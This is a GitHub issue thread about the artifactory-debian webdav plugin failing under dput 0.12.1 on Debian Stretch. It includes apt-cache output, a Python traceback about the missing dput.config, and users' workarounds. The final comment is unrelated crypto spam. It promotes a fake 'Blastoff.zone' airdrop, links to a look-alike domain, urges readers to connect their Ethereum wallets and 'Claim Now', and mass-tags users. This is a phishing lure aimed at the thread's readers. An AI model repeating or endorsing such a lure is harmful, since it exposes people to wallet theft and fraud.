### ISSUE TITLE
plugin fails with dput v0.12.1 on Debian Stretch

### ISSUE THREAD

**Issue by bollenn** [jhermann/artifactory-debian#9]
This plugin fails with dput v0.12.1.

Seems the install path now shall be `/usr/share/dput/dput/methods/webdav.py` but besides changing this path and the helper import some more errors are popping up...

**Comment by jhermann** [comment]
Please provide platform information (lsb_release -a) and/or "apt-cache policy dput".

**Comment by olof** [comment]
I can reproduce:

```
$ apt-cache policy dput
dput:
  Installed: 0.12.1
  Candidate: 0.12.1
  Version table:
 *** 0.12.1 500
        500 http://debian.lth.se/debian stretch/main amd64 Packages
        500 http://debian.lth.se/debian stretch/main i386 Packages
        100 /var/lib/dpkg/status
```

Just like @bollenn, I worked-around some issues,  but the error which I have had problems solving is that the dput.config (aka `__main__.config`) is no longer available:

```
Traceback (most recent call last):
  File "/usr/bin/dput", line 11, in <module>
    load_entry_point('dput==0.12.1', 'console_scripts', 'execute-dput')()
  File "/usr/share/dput/dput/dput.py", line 1153, in main
    files_to_upload, debug, 0, progress=progress)
  File "/usr/share/dput/dput/methods/webdav.py", line 365, in upload
    host_config, cli_params = _get_config_data(fqdn)
  File "/usr/share/dput/dput/methods/webdav.py", line 349, in _get_config_data
    host_argument = _get_host_argument(fqdn)
  File "/usr/share/dput/dput/methods/webdav.py", line 317, in _get_host_argument
    config = dput.config # pylint: disable=no-member
AttributeError: 'module' object has no attribute 'config'
```


The config object only lives in a local scope. Only by removing the use of `_get_config_data()` from `upload()` I was able to get it working. But I don't understand what I broke by doing so :-).

**Comment by bollenn** [comment]
@olof where you able to get all issues fixed?

**Comment by olof** [comment]
@bollenn Sorry for late reply; yes, with the caveat of my last comment: i just ripped of something that i didn't understand the need for, with the confidence of somebody who thinks they know what they are doing, but clearly don't :). But it worked for my use case/in my environment. No longer a user of Artifactory today.

**Comment by 0legR** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
flawlesscode254, @infojunkie, @happenwah, @pierlauro, @aiinkiestism, @josephjacks, @quezo, @rodrigodma, @michielglibert, @Kenneth-Brisco, @notatestuser, @Thunnini, @djattia, @nbayindirli, @kevinrwx, @ligi, @blitzmohit, @Silvrbckw, @ccc680, @Fooooooooooox
